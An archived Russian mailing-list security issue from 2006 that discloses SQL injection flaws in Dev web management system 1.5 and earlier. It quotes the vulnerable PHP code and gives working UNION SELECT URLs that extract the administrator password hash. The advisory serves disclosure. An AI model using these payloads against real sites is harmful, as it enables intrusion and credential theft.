Компьютер для продвинутых пользоватлей Выпуск по безопасности (comp.paper.supuser) : Рассылка : Subscribe.Ru

Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Январь 2006 →
	1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18 18.01.2006 03:05:14 07:05:25	19	20	21	22
23	24	25	26	27	28	29 29.01.2006 07:05:11 12:05:09 16:05:06
30 30.01.2006 07:05:11 12:05:10 16:05:09	31 31.01.2006 07:05:37 11:05:25 16:05:09

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпуск по безопасности

Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей

Содержание:

Dev web management system

ПО: Dev web management system
Версия: <= 1.5

Уязвимость:
В openforum.php линия 19:
....
$miestnost=mysql_fetch_array(mysql_query("SELECT id, nazov, editorid FROM forum1cat WHERE id=$cat",$spojenie));
....
Параметр 'cat' должным образом не проверяется и вы может вставить SQL-инъекцию независимо от magic_quoyes_gpc, например:
http://[цель]/[путь]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,109,105,110,95,112,97,115,115,119,111,114,100)
теперь вы видите MD5 хеш-пароль администратора...
В getfile.php:
....
include_once ("./register_globals.php");
if (!$cat) die ("Access denied");
include "admin/_dbase.conf.php";
$spojenie=mysql_pconnect ($conf_mysql_server,$conf_mysql_user_name,$conf_mysql_password);
mysql_select_DB ($conf_mysql_database_name);
include "class_configuration.php";
$configuration->ConfLoadDBtoPHP();
include "admin/_config.php";

echo "SELECT icon, icontype FROM prispevok1cat WHERE cat LIKE '$cat' LIMIT 1";
$image=mysql_fetch_array(mysql_query("SELECT icon, icontype FROM prispevok1cat WHERE cat LIKE '$cat' LIMIT 1", $spojenie));
if ($image) {
header ("Content-type: $image[icontype]");
echo $image[icon];
} else {
echo "Image not found";
}
....
Пример:
http://[цель]/[путь]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
В download_now.php линия 31-33:
....
$out=mysql_fetch_array(mysql_query("SELECT Count(id) FROM downloadmanager WHERE id = ".$target,$spojenie));
if ($out[0]==1) {
$out2 = mysql_fetch_array(mysql_query("SELECT * FROM downloadmanager WHERE id = $target",$spojenie));
....
Пример:
http://[цель]/[путь]/download_now.php?target=9999999999999[SQL]

Dev web management system

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора

Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки

Отписаться Вебом Почтой
Вспомнить пароль

В избранное

← Январь 2006 →
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18 18.01.2006 03:05:14 07:05:25	19	20	21	22
23	24	25	26	27	28	29 29.01.2006 07:05:11 12:05:09 16:05:06
30 30.01.2006 07:05:11 12:05:10 16:05:09	31 31.01.2006 07:05:37 11:05:25 16:05:09